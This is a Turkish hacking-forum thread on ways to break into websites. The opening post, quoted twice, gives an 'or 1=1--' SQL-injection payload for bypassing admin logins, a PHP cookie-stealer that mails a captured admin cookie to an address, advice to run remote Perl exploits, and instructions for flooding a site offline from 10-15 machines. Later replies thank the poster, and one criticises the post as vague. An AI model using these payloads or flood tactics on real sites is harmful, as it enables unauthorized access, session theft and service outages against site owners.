Site Hackleme Yöntemleri (1 Viewer)

Sgl İnjection Yoluyla ;
öncelikle hedef sitenin admin paneline ulaşmak istersiniz bunun için çeşitli exploitler vardır admın paneline ulaşmak için sql inj deneyebiliriz.username: or 1=1--şifre : or 1=1--gibi admin paneline böyle şeyler yazarak bir ihtimalde olsa girebilme şansımız vardır daha fazlasını forumda aratarak bulabilirisniz.
Exploit Yoluyla;
o sitenin portalına uygun olarak remote gibi bir exploit türü bulduğumuzda bunu perlde çalıştırarak sitede yetki sahibi olabiliriz.perl exploit kullanımı forumda mevcut aratırsanız bulabilirsiniz.eğer geniş bilgi istiyorsanız verebilirim.
Xss Yoluyla;
eğer serverda html komutları açık ise admin cookisini çalarak giriş yapabiliriz.yada adminin mailine xss yollayabiliriz.<? $cookie = $_GET['data']; $kime = "[email protected]";$konu = "cookie";mail ($kime,$konu,$cookie);?>bu kodu yazarak mesela.yada yönlendirme kodunu yazarakta yönlendirebiliriz siteyi başka bir adrese.Ayrıca htmlnin açık olup olmadıgını sitede mesaj yazma kısmına gelip sol alt taraflara bakarsanız oralarda yazar.
Flood Yoluyla;
flood yoluyla siteyi yavaşlatabilir yada bir süreliğine kapatabilirisiniz.flood programları sitede mevcut indirerek çalıştırabilirisiniz ama eğer bu uygulamayı 10-15 tane ayrı bilgisarlardan yaparsanız daha etkili olur.

 

elıne saglık

 

Sgl İnjection Yoluyla ;
öncelikle hedef sitenin admin paneline ulaşmak istersiniz bunun için çeşitli exploitler vardır admın paneline ulaşmak için sql inj deneyebiliriz.username: or 1=1--şifre : or 1=1--gibi admin paneline böyle şeyler yazarak bir ihtimalde olsa girebilme şansımız vardır daha fazlasını forumda aratarak bulabilirisniz.
Exploit Yoluyla;
o sitenin portalına uygun olarak remote gibi bir exploit türü bulduğumuzda bunu perlde çalıştırarak sitede yetki sahibi olabiliriz.perl exploit kullanımı forumda mevcut aratırsanız bulabilirsiniz.eğer geniş bilgi istiyorsanız verebilirim.
Xss Yoluyla;
eğer serverda html komutları açık ise admin cookisini çalarak giriş yapabiliriz.yada adminin mailine xss yollayabiliriz.<? $cookie = $_GET['data']; $kime = "[email protected]";$konu = "cookie";mail ($kime,$konu,$cookie);?>bu kodu yazarak mesela.yada yönlendirme kodunu yazarakta yönlendirebiliriz siteyi başka bir adrese.Ayrıca htmlnin açık olup olmadıgını sitede mesaj yazma kısmına gelip sol alt taraflara bakarsanız oralarda yazar.
Flood Yoluyla;
flood yoluyla siteyi yavaşlatabilir yada bir süreliğine kapatabilirisiniz.flood programları sitede mevcut indirerek çalıştırabilirisiniz ama eğer bu uygulamayı 10-15 tane ayrı bilgisarlardan yaparsanız daha etkili olur.

Anlatım İçin teşekkürler dostum...

 

Yanlış anlama arkadaşım ama bişey anlamadım. sql injection demişsin ama admin panel bypass tekniğini anlatmışsın. Arayada "şeyler" gibi genel bir kelime koymuşsun. Şey nedir? 20-25 sene önce salı günleri "Aranan Adam" diye bir program var. Haber başlıkları nasıldı biliyor musun? "Şeyini şey etttiğimin şeyi, aranan adamda" "şeyin şeyi şey olmuş, aranan adamda" "şey şey mi" gibi.

Exploit yoluyla diyorsun. Exploiti çalıştırmak için (local root örneğin) sitede bir şekilde dosyaları editleme, görme yetkimizin olması lazım (shell upload). Bir şekilde exploiti ya uzaktan bağlanıp, veya online olarak çalıştırabilmeliyiz.

Birde 2 cümle yazıp gerisi forumda mevcut demişsin. Ben kimseyi kötülemeye çalışmıyorum.Ben istiyorum ki bu forumda kaliteli içerikler paylaşılsın.